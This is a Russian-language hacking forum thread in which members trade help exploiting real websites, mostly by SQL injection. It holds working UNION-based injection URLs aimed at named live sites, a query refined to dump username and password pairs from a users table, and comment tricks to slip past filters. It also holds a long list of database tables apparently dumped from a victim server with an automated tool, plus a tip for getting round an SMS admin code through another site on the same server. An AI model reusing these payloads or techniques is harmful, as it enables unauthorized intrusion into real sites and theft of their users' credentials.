Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    спс,всё уже узнал!
    Но теперь препятствует ещё одна проблема как захожу в админку ввожу логин и пасс,но ещё требует какойто временный код,всю бд пересмотрел временных кодов там нет!помогите кто нито)))
    или можно создать запросом как то нового админа или ещё как?
     
    #17421 Faaax, 24 Jul 2011
    Last edited: 24 Jul 2011
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    там временный код через смс пересылается на телефон. Однако, на одном из сайтов на этом сервере есть админка, где код не нужен.
     
    1 person likes this.
  3. exmicru

    exmicru New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    1
    Reputations:
    1
    mysql 5.1.57

    id=0'+union+select+1,2,3,4,5+--+

    Скуля, название таблиц получил, а колонки не выводит.

    И

    id=0'+union+select+1,2,3,4,5+from+users+--+

    Не выводит, как будто таблиц не существует.

    В чём может быть проблема?
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    id=0'+union+select+column_name+from+db_name.table_name--+
     
    _________________________
  5. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Сперва узнай в какой базе находится табла. Select table_schema from information_schema.tables where table_name=%table_name%
     
  6. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Помогите раскрутить, пожалуйста
    www.ca[G00GLE]ndy.ru/detail.asp?PrId=690+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+FROM+sys.dual
    Могу подарить [thread=264357]SSH[/thread]
     
    _________________________
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как-то так:

    DB Name: DBGP1
    Table found: OL$
    Table found: OL$HINTS
    Table found: OL$NODES
    Table found: SRS$
    Table found: MGMT_SNAPSHOT
    Table found: MGMT_SNAPSHOT_SQL
    Table found: MGMT_BASELINE
    Table found: MGMT_BASELINE_SQL
    Table found: MGMT_CAPTURE
    Table found: MGMT_CAPTURE_SQL
    Table found: MGMT_RESPONSE_CONFIG
    Table found: MGMT_LATEST
    Table found: MGMT_LATEST_SQL
    Table found: MGMT_HISTORY
    Table found: MGMT_HISTORY_SQL
    Table found: MGMT_BSLN_DATASOURCES
    Table found: MGMT_BSLN_BASELINES
    Table found: MGMT_BSLN_INTERVALS
    Table found: MGMT_BSLN_METRICS
    Table found: MGMT_BSLN_STATISTICS
    Table found: MGMT_BSLN_THRESHOLD_PARMS
    Table found: EXF$VERSION
    Table found: EXF$PARAMETER
    Table found: EXF$DEFIDXPARAM
    Table found: EXF$ESETIDXPARAM
    Table found: SYS_IOT_OVER_40438
    Table found: EXF$PREDATTRMAP
    Table found: EXF$VALIDIOPER
    Table found: EXF$VALIDPRIVS
    Table found: EXF$PLAN_TABLE
    Table found: DM$P_MODEL
    Table found: DM$P_MODEL_TABLES
    Table found: XDB$ROOT_INFO
    Table found: XDB$H_INDEX
    Table found: XDB$COLUMN_INFO
    Table found: XDB$PATH_INDEX_PARAMS
    Table found: XDB$NMSPC_ID
    Table found: XDB$QNAME_ID
    Table found: XDB$PATH_ID
    Table found: XDB$CHECKOUTS
    Table found: XDB$DXPTAB
    Table found: XDB$DXPATH
    Table found: MIGR9202STATUS
    Table found: SYS_IOT_OVER_42474
    Table found: SYS_IOT_OVER_42481
    Table found: SYS_IOT_OVER_42488
    Table found: SYS_IOT_OVER_42491
    Table found: RLM$SCHACTLIST
    Table found: SYS_IOT_OVER_42510
    Table found: SYS_IOT_OVER_42513
    Table found: SYS_IOT_OVER_42516
    Table found: SYS_IOT_OVER_42519
    Table found: SI_IMAGE_FORMATS_TAB
    Table found: SI_FEATURES_TAB
    Table found: SI_VALUES_TAB
    Table found: ORD_CARTRIDGE_COMPONENTS
    Table found: MGMT_NOTIFY_QTABLE
    Table found: AQ$_MGMT_NOTIFY_QTABLE_S
    Table found: SYS_IOT_OVER_49865
    Table found: MGMT_VERSIONS
    Table found: MGMT_TABLE_SIZES
    Table found: MGMT_INDEX_SIZES
    Table found: MGMT_REBUILD_INDEXES
    Table found: MGMT_LICENSES
    Table found: MGMT_AVAILABILITY
    Table found: MGMT_CURRENT_AVAILABILITY
    Table found: MGMT_AVAILABILITY_MARKER
    Table found: MGMT_MASTER_AGENT
    Table found: MGMT_MASTER_CHANGED_CALLBACK
    Table found: MGMT_TARGET_BASELINES
    Table found: MGMT_TARGET_BASELINES_DATA
    Table found: MGMT_METRICS
    Table found: MGMT_METRICS_EXT
    Table found: MGMT_TARGET_TYPES
    Table found: MGMT_TARGETS
    Table found: MGMT_TYPE_PROPERTIES
    Table found: MGMT_TARGET_PROP_DEFS
    Table found: MGMT_TARGET_PROPERTIES
    Table found: MGMT_TARGET_AGENT_ASSOC
    Table found: SYS_IOT_OVER_49969
    Table found: SYS_IOT_OVER_49972
    Table found: MGMT_STRING_METRIC_HISTORY
    Table found: MGMT_LONG_TEXT
    Table found: MGMT_METRICS_COMPOSITE_KEYS
    Table found: MGMT_TARGETS_DELETE
    Table found: MGMT_TARGET_ADD_CALLBACKS
    Table found: MGMT_TARGET_DELETE_CALLBACKS
    Table found: MGMT_TARGET_DELETE_EXCEPTIONS
    Table found: MGMT_DUPLICATE_TARGETS
    Table found: MGMT_CHANGE_AGENT_URL
    Table found: MGMT_TARGET_ROLLUP_TIMES
    Table found: MGMT_METRIC_ERRORS
    Table found: MGMT_CURRENT_METRIC_ERRORS
    Table found: MGMT_TARGET_ASSOC
    Table found: MGMT_TARGET_ASSOC_INSTANCE
    Table found: MGMT_ANNOTATION
    Table found: MGMT_METADATA_SETS
    Table found: MGMT_CALLBACKS
    Table found: MGMT_BCN_TARGET
    Table found: MGMT_BCN_AVAIL_DEF
    Table found: MGMT_BCN_AVAIL_JOB
    Table found: MGMT_BCN_TXN_DEFN
    Table found: MGMT_BCN_TXN_HTTP
    Table found: MGMT_BCN_TXN_HTTP_PARAM
    Table found: MGMT_BCN_TXN_PING
    Table found: MGMT_BCN_TARGET_TXN
    Table found: MGMT_BCN_TARGET_LOCK
    Table found: MGMT_ADMIN_METRIC_THRESHOLDS
    Table found: MGMT_BCN_AVAIL_LOG
    Table found: MGMT_E2E_SUMMARY
    Table found: MGMT_E2E_DETAILS
    Table found: MGMT_E2E_SQL
    Table found: MGMT_E2E_JDBC
    Table found: MGMT_E2E_SQL_STMT
    Table found: MGMT_E2E_SQL_CONN
    Table found: MGMT_E2E_SUMMARY_1HOUR
    Table found: MGMT_E2E_SUMMARY_1DAY
    Table found: MGMT_E2E_DETAILS_1HOUR
    Table found: MGMT_E2E_DETAILS_1DAY
    Table found: MGMT_E2E_SQL_1HOUR
    Table found: MGMT_E2E_SQL_1DAY
    Table found: MGMT_E2E_JDBC_1HOUR
    Table found: MGMT_E2E_JDBC_1DAY
    Table found: MGMT_BLACKOUT_SCHEDULE
    Table found: MGMT_BLACKOUTS
    Table found: MGMT_BLACKOUT_TARGET_DETAILS
    Table found: MGMT_BLACKOUT_FLAT_TARGETS
    Table found: MGMT_BLACKOUT_REASON
    Table found: MGMT_BLACKOUT_HISTORY
    Table found: MGMT_BLACKOUT_STATE
    Table found: MGMT_BLACKOUT_PROXY_TARGETS
    Table found: MGMT_METRIC_COLLECTIONS
    Table found: MGMT_METRIC_COLLECTIONS_REP
    Table found: MGMT_COLLECTION_PROPERTIES
    Table found: MGMT_METRIC_THRESHOLDS
    Table found: MGMT_PARAMETERS
    Table found: MGMT_OMS_PARAMETERS
    Table found: MGMT_CREDENTIALS
    Table found: MGMT_CREDENTIAL_TYPES
    Table found: MGMT_CREDENTIAL_TYPE_COLUMNS
    Table found: MGMT_CREDENTIAL_TYPE_COL_VALS
    Table found: MGMT_CREDENTIAL_SETS
    Table found: MGMT_CREDENTIAL_SET_COLUMNS
    Table found: MGMT_CREDENTIALS2
    Table found: MGMT_ARU_CREDENTIALS
    Table found: MGMT_VIEW_USER_CREDENTIALS
    Table found: MGMT_EMCRYPTO_SEED
    Table found: MGMT_UPDATE_OPERATIONS
    Table found: MGMT_UPDATE_OPERATIONS_DATA
    Table found: MGMT_UPDATE_OPERATIONS_DETAILS
    Table found: MGMT_UPDATE_THRESHOLDS_DATA
    Table found: MGMT_UPDATE_PROPERTIES_DATA
    Table found: MGMT_UPDATE_CREDENTIALS_DATA
    Table found: MGMT_ECM_PATCH_CACHE
    Table found: MGMT_ECM_ARU_MAP
    Table found: MGMT_ECM_SNAPSHOT
    Table found: MGMT_ECM_SNAP_COMPONENT_INFO
    Table found: MGMT_ECM_GEN_SNAPSHOT
    Table found: MGMT_ECM_SNAPSHOT_METADATA
    Table found: MGMT_ECM_SNAPSHOT_MD_TABLES
    Table found: MGMT_ECM_SNAPSHOT_MD_COLUMNS
    Table found: MGMT_ECM_LOADED_FILES
    Table found: MGMT_INV_CONTAINER
    Table found: MGMT_INV_CONTAINER_PROPERTY
    Table found: MGMT_INV_COMPONENT
    Table found: MGMT_INV_DEPENDENCY_RULE
    Table found: MGMT_INV_PATCHSET
    Table found: MGMT_INV_VERSIONED_PATCH
    Table found: MGMT_INV_PATCH
    Table found: MGMT_INV_COMPONENT_PATCH
    Table found: MGMT_INV_PATCH_FIXED_BUG
    Table found: MGMT_INV_FILE
    Table found: MGMT_INV_PATCHED_FILE
    Table found: MGMT_INV_PATCHED_FILE_COMP
    Table found: MGMT_TARGET_TYPE_COMPONENT_MAP
    Table found: MGMT_ECM_HOST_CONFIGS_TO_DEL
    Table found: MGMT_ARU_PRODUCTS
    Table found: MGMT_ARU_PLATFORMS
    Table found: MGMT_ARU_RELEASES
    Table found: MGMT_ARU_LANGUAGES
    Table found: MGMT_ARU_FAMILY_PRODUCT_MAP
    Table found: MGMT_ARU_PRODUCT_RELEASE_MAP
    Table found: MGMT_ARU_OUI_COMPONENTS
    Table found: MGMT_BUG_ADVISORY
    Table found: MGMT_BUG_ADVISORY_BUG
    Table found: MGMT_BUG_AVAILABLE_PATCH
    Table found: MGMT_BUG_PATCH_PLATFORM
    Table found: MGMT_BUG_PATCH_FIXES_BUG
    Table found: MGMT_BUG_FIX_APPLIC_COMP_LIST
    Table found: MGMT_BUG_FIX_APPLICABLE_COMP
    Table found: MGMT_BUG_ADV_HOME_PATCH
    Table found: MGMT_DELTA_IDS
    Table found: MGMT_DELTA_ENTRY
    Table found: MGMT_DELTA_ENTRY_VALUES
    Table found: MGMT_DELTA_ID_VALUES
    Table found: MGMT_DELTA_SNAP
    Table found: MGMT_HC_SYSTEM_SUMMARY
    Table found: MGMT_HC_HARDWARE_MASTER
    Table found: MGMT_HC_CPU_DETAILS
    Table found: MGMT_HC_IOCARD_DETAILS
    Table found: MGMT_HC_NIC_DETAILS
    Table found: MGMT_HC_OS_SUMMARY
    Table found: MGMT_HC_OS_PROPERTIES
    Table found: MGMT_HC_OS_COMPONENTS
    Table found: MGMT_HC_FS_MOUNT_DETAILS
    Table found: MGMT_HC_VENDOR_SW_SUMMARY
    Table found: MGMT_HC_VENDOR_SW_COMPONENTS
    Table found: MGMT_ECM_RESOURCES
    Table found: MGMT_DELTA_SAVED_COMPARISON
    Table found: MGMT_DELTA_COMP_SUMMARIES
    Table found: MGMT_DELTA_SUMMARY_ERRORS
    Table found: MGMT_DELTA_COMPARISON_DELTAS
    Table found: MGMT_DELTA_COMP_KEY_COLS
    Table found: MGMT_DELTA_COMP_DELTA_DETAILS
    Table found: MGMT_DELTA_COMP_PROPERTIES
    Table found: MGMT_POLICY_RULE
    Table found: MGMT_POLICY_RULE_DEF_COLUMNS
    Table found: MGMT_POLICY_RULE_DEF_PARAMS
    Table found: MGMT_POLICY_GROUP
    Table found: MGMT_POLICY_PARAMS
    Table found: MGMT_POLICY_RULE_CRITERIA
    Table found: MGMT_POLICY_TARGET_CRITERIA
    Table found: MGMT_POLICY_VIOLATIONS
    Table found: MGMT_POLICY_VIOLATION_ROWS
    Table found: MGMT_POLICY_VIOLATION_VALUES
    Table found: MGMT_POLICY_SNAPSHOT_CRITERIA
    Table found: MGMT_POLICY_ERRORS
    Table found: MGMT_COMP_RESULT_TO_JOB_MAP
    Table found: MGMT_ECM_CSA_SNAPSHOT_INFO
    Table found: MGMT_ECM_CSA_GENERAL_INFO
    Table found: MGMT_ECM_CSA
    Table found: MGMT_ECM_CSA_COOKIES
    Table found: MGMT_ECM_CSA_CUSTOM
    Table found: MGMT_ECM_HW
    Table found: MGMT_ECM_HW_CPU
    Table found: MGMT_ECM_HW_IOCARD
    Table found: MGMT_ECM_HW_NIC
    Table found: MGMT_ECM_OS
    Table found: MGMT_ECM_OS_PROPERTY
    Table found: MGMT_ECM_OS_COMPONENT
    Table found: MGMT_ECM_OS_FILESYSTEM
    Table found: MGMT_ECM_OS_REGISTERED_SW
    Table found: MGMT_ECM_OS_REGISTERED_SW_COMP
    Table found: MGMT_FAILOVER_TABLE
    Table found: MGMT_FAILOVER_CALLBACKS
    Table found: MGMT_TARGET_MEMBERSHIPS
    Table found: MGMT_FLAT_TARGET_MEMBERSHIPS
    Table found: MGMT_COMP_TARGET_DEF
    Table found: MGMT_JOB_COMMAND
    Table found: MGMT_JOB_TYPE_INFO
    Table found: MGMT_JOB_SINGLE_TARGET_TYPES
    Table found: MGMT_JOB_EXECPLAN
    Table found: MGMT_JOB_STEP_PARAMS
    Table found: MGMT_JOB_NESTED_JOB_TARGETS
    Table found: MGMT_JOB_PARAM_SOURCE
    Table found: MGMT_JOB_USER_PARAMS
    Table found: MGMT_JOB_SQL_PARAMS
    Table found: MGMT_JOB_CRED_PARAMS
    Table found: MGMT_JOB_SUBST_PARAMS
    Table found: MGMT_JOB_PROP_PARAMS
    Table found: MGMT_JOB_VALUE_PARAMS
    Table found: MGMT_JOB_SEC_INFO
    Table found: MGMT_JOB_LOCK_INFO
    Table found: MGMT_JOB_LOCK_TARGETS
    Table found: MGMT_JOB_SCHEDULE
    Table found: MGMT_JOB
    Table found: MGMT_JOB_TARGET
    Table found: MGMT_JOB_FLAT_TARGETS
    Table found: MGMT_JOB_EXT_TARGETS
    Table found: MGMT_JOB_OUTPUT
    Table found: MGMT_JOB_LARGE_PARAMS
    Table found: MGMT_JOB_EXEC_SUMMARY
    Table found: MGMT_JOB_EXEC_EVENT_PARAMS
    Table found: MGMT_JOB_EXEC_LOCKS
    Table found: MGMT_JOB_PARAMETER
    Table found: MGMT_JOB_HISTORY
    Table found: MGMT_JOB_EXECUTION
    Table found: MGMT_JOB_STEP_COMMAND_LOG
    Table found: MGMT_JOB_EMD_STATUS_QUEUE
    Table found: MGMT_JOB_PURGE_POLICIES
    Table found: MGMT_JOB_PURGE_CRITERIA
    Table found: MGMT_JOB_PURGE_TARGETS
    Table found: MGMT_JOB_PURGE_VALUES
    Table found: MGMT_JOB_EVENT
    Table found: MGMT_JOB_TYPE_URI_INFO
    Table found: MGMT_JOB_TYPE_DISPLAY_PARAM
    Table found: MGMT_JOB_TYPE_DISPLAY_INFO
    Table found: MGMT_JOB_STEP_TARGETS
    Table found: MGMT_JOB_CALLBACKS
    Table found: MGMT_JOB_QUEUES
    Table found: MGMT_JOB_BLACKOUT_ASSOC
    Table found: MGMT_PERFORMANCE_NAMES
    Table found: MGMT_SYSTEM_ERROR_LOG
    Table found: MGMT_SYSTEM_PERFORMANCE_LOG
    Table found: MGMT_METRIC_DEPENDENCY_DEF
    Table found: MGMT_METRIC_DEPENDENCY
    Table found: MGMT_METRIC_DEPENDENCY_DETAILS
    Table found: MGMT_NOTIFY_EMAIL_GATEWAY
    Table found: MGMT_NOTIFY_PROFILES
    Table found: MGMT_NOTIFY_DEVICES
    Table found: MGMT_NOTIFY_DEVICE_PARAMS
    Table found: MGMT_NOTIFY_SCHEDULES
    Table found: MGMT_NOTIFY_DEV_SCHEDULES
    Table found: MGMT_NOTIFY_RULES
    Table found: MGMT_NOTIFY_RULE_CONFIGS
    Table found: MGMT_NOTIFY_REQUEUE
    Table found: MGMT_NOTIFY_QUEUES
    Table found: MGMT_NOTIFICATION_LOG
    Table found: MGMT_EMD_PING
    Table found: MGMT_USER_TYPE_METRIC_PREFS
    Table found: MGMT_USER_FOLDERS
    Table found: MGMT_USER_PREFERENCES
    Table found: MGMT_PORTLET_PREFERENCE_STORE
    Table found: MGMT_PURGE_POLICY
    Table found: MGMT_PURGE_POLICY_GROUP
    Table found: MGMT_PURGE_POLICY_TARGET_STATE
    Table found: MGMT_SEC_INFO
    Table found: MGMT_AGENT_SEC_INFO
    Table found: EM_IPW_INFO
    Table found: MGMT_SEVERITY
    Table found: MGMT_CURRENT_SEVERITY
    Table found: MGMT_PRIVS
    Table found: MGMT_ROLES
    Table found: MGMT_FLAT_ROLE_GRANTS
    Table found: MGMT_USER_CONTEXT
    Table found: MGMT_USER_CALLBACKS
    Table found: MGMT_CREATED_USERS
    Table found: MGMT_LOGIN_ASSISTANTS
    Table found: MGMT_LICENSE_DEFINITIONS
    Table found: MGMT_HA_BACKUP
    Table found: MGMT_HA_MTTR
    Table found: MGMT_DB_DBNINSTANCEINFO_ECM
    Table found: MGMT_DB_CONTROLFILES_ECM
    Table found: MGMT_DB_REDOLOGS_ECM
    Table found: MGMT_DB_ROLLBACK_SEGS_ECM
    Table found: MGMT_DB_SGA_ECM
    Table found: MGMT_DB_LICENSE_ECM
    Table found: MGMT_DB_TABLESPACES_ECM
    Table found: MGMT_DB_DATAFILES_ECM
    Table found: MGMT_HA_INFO_ECM
    Table found: MGMT_HA_INIT_PARAMS_ECM
    Table found: MGMT_HA_FILES_ECM
    Table found: MGMT_HA_RMAN_CONFIG_ECM
    Table found: MGMT_DB_FEATUREUSAGE
    Table found: MGMT_SQL_EVALUATION
    Table found: MGMT_SQL_BIND_VARS
    Table found: MGMT_SQLPROBLEM_FACTORS
    Table found: MGMT_PLANPROBLEM_FACTORS
    Table found: MGMT_SQL_REUSE
    Table found: MGMT_SQL_SUMMARY
    Table found: MGMT_SQL_PLAN
    Table found: MGMT_SQL_METRIC_HELPER
    Table found: MGMT_BACKUP_CONFIGURATION
    Table found: MGMT_RCVCAT_CONFIG
    Table found: MGMT_RCVCAT_REPOS
    Table found: MGMT_DBNET_TNS_ADMINS
    Table found: MGMT_DB_LATEST_HDM_FINDINGS
    Table found: MGMT_DB_HDM_METRIC_HELPER
    Table found: MGMT_SPACE_METRICS
    Table found: MGMT_DB_RECUSERSETTINGS_ECM
    Table found: MGMT_DB_RECTSSETTINGS_ECM
    Table found: MGMT_DB_RECSEGMENTSETTINGS_ECM
    Table found: MGMT_DB_INVOBJS_ECM
    Table found: MGMT_OB_ADMIN_CLIENT_DB
    Table found: MGMT_OB_ADMIN_HOSTS
    Table found: MGMT_OSM_DISK_GROUP_ECM
    Table found: MGMT_HA_CLS_INTR_CONN
    Table found: MGMT_HA_RAC_INTR_CONN
    Table found: DEPT
    Table found: EMP
    Table found: BONUS
    Table found: SALGRADE
    Table found: TMP_PAOLO
    Table found: TACL
    Table found: TACTION
    Table found: TDICSTORAGE
    Table found: TDICTIONARY
    Table found: TGROUP
    Table found: TNEWS
    Table found: TPRESSRELEASE
    Table found: TPRODUCT
    Table found: TPRODUCTATTR
    Table found: TPRODUCTSTORAGE
    Table found: TPRODUCTTECH
    Table found: TPRODUCTTYPE
    Table found: TSCITY
    Table found: TSERVICECENTRE
    Table found: TSREGION
    Table found: TSTATICCONTENT
    Table found: TTECHNOLOGY
    Table found: TACL
    Table found: TACTION
    Table found: TDICSTORAGE
    Table found: TDICTIONARY
    Table found: TGROUP
    Table found: TNEWS
    Table found: TPRESSRELEASE
    Table found: TPRODUCT
    Table found: TPRODUCTATTR
    Table found: TPRODUCTSTORAGE
    Table found: TPRODUCTTECH
    Table found: TPRODUCTTYPE
    Table found: TSCITY
    Table found: TSERVICECENTRE
    Table found: TSREGION
    Table found: TTECHNOLOGY
    Table found: TACL
    Table found: TACTION
    Table found: TDICSTORAGE
    Table found: TDICTIONARY
    Table found: TGROUP
    Table found: TNEWS
    Table found: TPERSON
    Table found: TPRESSRELEASE
    Table found: TPRODUCT
    Table found: TPRODUCTATTR
    Table found: TPRODUCTSTORAGE
    Table found: TPRODUCTTECH
    Table found: TPRODUCTTYPE
    Table found: TSCITY
    Table found: TSERVICECENTRE
    Table found: TSREGION
    Table found: TTECHNOLOGY
    Table found: TS_STATE
    Table found: TPERSON
    Table found: HD_ERROR_TYPE
    Table found: SOFTWARE
    Table found: PC
    Table found: PC_WARRANTY
    Table found: HD_USERS_BCK_16062011
    Table found: TPRTYPE
    Table found: TPRMEMBER
    Table found: PM_STATE
    Table found: PM_TYPE
    Table found: PM_POST
    Table found: TPRTYPE
    Table found: TPRMEMBER
    Table found: PM_POST_ATTACHMENTS
    Table found: HD_USERS_BCK_02032011
    Table found: PM_PROBLEM
    Table found: MGMT_DIROBJ_USERS_HOTLIST
    Table found: MGMT_DB_INIT_PARAMS_ECM
    Table found: MGMT_LICENSABLE_TARGET_TYPES
    Table found: MGMT_USER_JOBS
    Table found: MGMT_USER_TARGETS
    Table found: MGMT_PRIV_GRANTS
    Table found: MGMT_ROLE_GRANTS
    Table found: MGMT_PRIV_INCLUDES
    Table found: MGMT_LAST_VIOLATION
    Table found: MGMT_NOTIFY_NOTIFYEES
    Table found: ESM_COLLECTION
    Table found: MGMT_COLLECTION_CREDENTIALS
    Table found: MGMT_JOB_CREDENTIALS
    Table found: MGMT_CONTAINER_CREDENTIALS
    Table found: MGMT_ENTERPRISE_CREDENTIALS
    Table found: MGMT_HOST_CREDENTIALS
    Table found: MGMT_TARGET_CREDENTIALS
    Table found: MGMT_CREDENTIAL_TYPE_REF
    Table found: MGMT_BLACKOUT_WINDOWS
    Table found: MGMT_METRICS_1DAY
    Table found: MGMT_METRICS_1HOUR
    Table found: MGMT_CURRENT_METRICS
    Table found: MGMT_METRICS_RAW
    Table found: AQ$_MGMT_NOTIFY_QTABLE_I
    Table found: AQ$_MGMT_NOTIFY_QTABLE_G
    Table found: AQ$_MGMT_NOTIFY_QTABLE_H
    Table found: AQ$_MGMT_NOTIFY_QTABLE_T
    Table found: RLM4J$ATTRALIASES
    Table found: RLM4J$RULESET
    Table found: RLM4J$EVTSTRUCTS
    Table found: RLM$JOBQUEUE
    Table found: RLM$SCHACTERRS
    Table found: RLM$INCRRRSCHACT
    Table found: RLM$PARSEDCOND
    Table found: RLM$DMLEVTTRIGS
    Table found: RLM$ORDERCLSALS
    Table found: RLM$EQUALSPEC
    Table found: RLM$PRIMEVTTYPEMAP
    Table found: RLM$RSPRIMEVENTS
    Table found: RLM$RULESETPRIVS
    Table found: RLM$RULESET
    Table found: RLM$EVENTSTRUCT
    Table found: EXF$EXPSETSTATS
    Table found: EXF$IDXSECOBJ
    Table found: EXF$ASUDFLIST
    Table found: EXF$ATTRLIST
    Table found: EXF$EXPSETPRIVS
    Table found: EXF$EXPRSET
    Table found: EXF$ATTRSET
    Table found: EXF$JAVAMSG
    Table found: MGMT_DB_SIZE_GTT
    Table found: MGMT_DB_FILE_GTT
    Table found: MGMT_BSLN_RAWDATA
    Table found: MGMT_TEMPT_SQL
    Table found: TS_VMO
    Table found: TS_TIME_VMO
    Table found: MIGR_TS_ACTIVITY
    Table found: MIGR_TS_USERS
    Table found: TS_BOOKING_USER
    Table found: TS_PROJECTS
    Table found: HD_CENTRALLY_MANAGE
    Table found: HD_STATE
    Table found: HD_APPLICATION
    Table found: HD_PRIORITY
    Table found: TS_HUMANRESOURCES_MAIL
    Table found: HD_MONITOR_SR
    Table found: HD_DIPARTIMENTO
    Table found: TS_TYPE_VMO
    Table found: HD_USERS
    Table found: HD_WORKFLOW_TYPE
    Table found: TS_APPROVAL
    Table found: HD_CONNECT
    Table found: HD_WORKFLOW
    Table found: MGMT_ADMIN_LICENSES
    Table found: HD_SOFTWARE
    Table found: TS_TIMESHEET
    Table found: LOGGED_USER
    Table found: HD_REQUEST_TYPE
    Table found: HD_IMPACT
    Table found: TS_TIMESHEET_SENT
    Table found: TS_TIMESHEET_APPROVED
    Table found: HD_FCA
    Table found: TS_TIMESHEET_COMPLETED
    Table found: TS_ACTIVITY
    Table found: HD_PC
    Table found: HD_GROUP
    Table found: TS_PROJECT_ATTACHMENTS
    Table found: TS_ACTIVITY_ATTACHMENTS
    Table found: MIGR_TS_PROJECT
    Table found: TS_ACTIVITY_LOG
    Table found: HD_SERVICE_REQUEST
    Table found: BACKUP_TS_TIMESHEET
    Table found: HD_ATTACH
    Table found: RLM$VALIDPRIVS
    Table found: RLM$RULESETSTCODE
    Table found: RLM$ERRCODE
     
    #17427 FlaktW, 25 Jul 2011
    Last edited by a moderator: 25 Jul 2011
    1 person likes this.
  8. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    И теперь главное, расскажи как ты это получил, пожалуйста.
     
    _________________________
    1 person likes this.
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Он использовал havij
     
    _________________________
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Всем привет, помогите плыз разкрутить скулю,
    http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729
    я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?
     
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Это ни разу не скуль. Пойми простые основы как определить есть ли скуль в запросе или нет. Простое подсовывание кавычки в запрос с последующим редиректом/выводом пустой страницы/выводом ошибки скрипта не значат о наличии скули на 100%.
     
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    [user]Expl0ited[/user], вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users

    http://www.gagauzia.md/search.php

    "мой запрос":
    'and(1=0)union(select(1),2,3,4,(select(@x)from(select(@x:=0x00),(select(0)from(table_name=0x7573657273)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,password))))x),6)#
     
    #17432 547, 25 Jul 2011
    Last edited: 25 Jul 2011
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    немного модифицировал запрос :)

    'and(1=0)union(select(1),2,3,4,(select(@x)from(select(@x:=0x00),(select(0)from(users)where(1)in(@x:=concat(@x,0x3a,username,0x3a,password))))x),6)#
     
    _________________________
    1 person likes this.
  14. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    исходник php файла кодирован в base64.
    Но при попытке декодировать онлайн декодерами, вылезает билеберда :(
    вот пример исходника
    http://zalil.ru/31466463
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    заюзай notepad++ например. Там что-то бинарное
     
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,version%28%29,8,9

    таблички вывести не получилось(

    http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,uhnex(hex(table_name)),8,9+from+information_schema.tables --+

    есть идеи?
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,/*!concat_ws%280x3a,table_schema,table_name,column_name%29*/,4,5,6,7,8,9+from+information_schema.columns--


    же
     
    1 person likes this.
  18. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    а поподробнее можно?)
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.

    Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.


    p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.
     
  20. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    ладно пасиба, буду пробывать)
     
Thread Status:
Not open for further replies.